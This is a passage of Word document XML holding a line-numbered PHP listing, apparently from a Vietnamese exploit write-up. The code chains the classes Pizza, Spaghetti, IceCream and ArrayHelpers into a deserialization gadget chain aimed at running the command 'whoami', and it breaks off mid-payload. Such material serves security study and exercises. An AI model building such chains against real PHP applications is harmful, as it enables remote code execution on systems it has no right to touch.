          </w:p>
          <w:p w14:paraId="5496CC36" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3825188C" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022B800A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59DBB68E" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF744E5" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151AF7D6" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A27CC5" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62997BF6" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353589E0" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F7135D" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:lastRenderedPageBreak/>
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EAED171" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A5C326" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>44</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="393C869C" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6204E79C" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>46</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71363CD0" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>47</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C7DC0B" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>48</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36515BCD" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>49</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3B9E16" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2CB14D" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>51</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299A7B64" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>52</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267C6972" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE60426" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>54</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C39CF17" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>55</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CA826A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>56</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53FA0D46" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>57</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ADC1E6E" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>58</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2988404C" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>59</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B177162" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>60</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D65AB44" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>61</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40685AD8" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>62</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E71F625" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74FCD5EF" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="22A832A1" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>namespace</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> Helpers {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29AB0742" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> ArrayIterator;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21422E5E" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="02F99941" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ArrayHelpers</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>extends</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> ArrayIterator {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C790291" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        #[\ReturnTypeWillChange]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0964581D" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> current() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6994F612" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">            $value = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>parent</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t>::current();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12B110D2" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">            call_user_func($this-&gt;callback, $value);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DDEFA91" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $value;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3F61F1" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409D4F84" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E00432E" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1E3FD0" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="7282CB07" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>namespace</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EB3BBCA" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IceCream</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7037EBC1" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $flavors;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5C2DDF" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $topping;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67588712" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="4A42AD2F" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> __invoke() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFAB046" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> ($this-&gt;flavors </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $flavor) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E496337" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $flavor;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60702380" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="490EBC57" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555C4373" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F94778E" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="0DBB6831" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spaghetti</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6998DEF7" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $sauce;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28AE884B" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $noodles;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AAF6190" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $portion;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453EB39E" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="117D9A3B" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> __get($name) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A927724" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">            ($this-&gt;sauce)();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF17245" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB9CB3B" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB6948A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="2D6D4096" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pizza</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="535374C9" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $price;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43B428FF" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $cheese;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7195A0A4" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $size;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1440A3E6" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="0EDC6CD3" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> __destruct() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39478BF5" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> $this-&gt;size-&gt;what;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D0FD6A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549682F4" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2AB45E" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="5A5638F0" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// Mã thực thi chính</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D33145" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $exploit = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> \Helpers\ArrayHelpers([</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"whoami"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t>]);</w:t>
            </w:r>
